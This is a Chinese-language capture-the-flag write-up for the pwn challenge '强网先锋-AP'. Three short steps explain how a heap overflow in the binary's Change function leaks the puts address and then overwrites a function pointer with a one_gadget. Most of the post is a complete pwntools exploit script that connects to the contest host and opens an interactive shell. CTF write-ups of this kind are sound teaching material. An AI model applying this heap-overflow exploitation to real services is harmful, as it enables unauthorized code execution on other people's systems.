[Pwn] 强网先锋-AP - mf xp0int Posted on May 27 2019 1. 送分题,Change有个很明显的堆溢出,还贴心的在堆上放了puts函数的地址。 2. Get两次,利用第一个堆溢出到第二个的puts函数指针前,打印,即可获得puts地址 3. 再次利用第一个的堆溢出,修改puts为one_gadget,调用puts即可getshell  脚本如下 ```python #!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * context.log_level = 'debug' p = remote('117.78.60.139',30501) libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') def Get(length, name): p.sendlineafter('Choice >> ','1') p.sendlineafter('The length of my owner\'s name:', str(length)) p.sendafter('Give me my owner\'s name:', name) def Open(idx): p.sendlineafter('Choice >> ','2') p.sendlineafter('would you want to open?',str(idx)) def Change(idx,length,name): p.sendlineafter('Choice >> ','3') p.sendlineafter('you want to change it\'s owner\'s name?',str(idx)) p.sendlineafter('The length of my owner\'s name:', str(length)) p.sendafter('Give me my owner\'s name:', name) Get(0x20,'1'*0x10) Get(0x20,'2'*0x10) Change(0,57,'3'*56) Open(0) p.recvuntil('3'*56) leak = p.recv(6) libc.address = u64(leak.ljust(8,'\x00')) - libc.symbols['puts'] p.info('libc.address: %s' % hex(libc.address)) one_gadget = 0x45216 Change(0,57 + 8,'3'*56 + p64(libc.address + one_gadget)) Open(1) p.interactive() ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Web] 高明的黑客 - LanceaKing [Pwn] trywrite -cpt.shao
没有帐号? 立即注册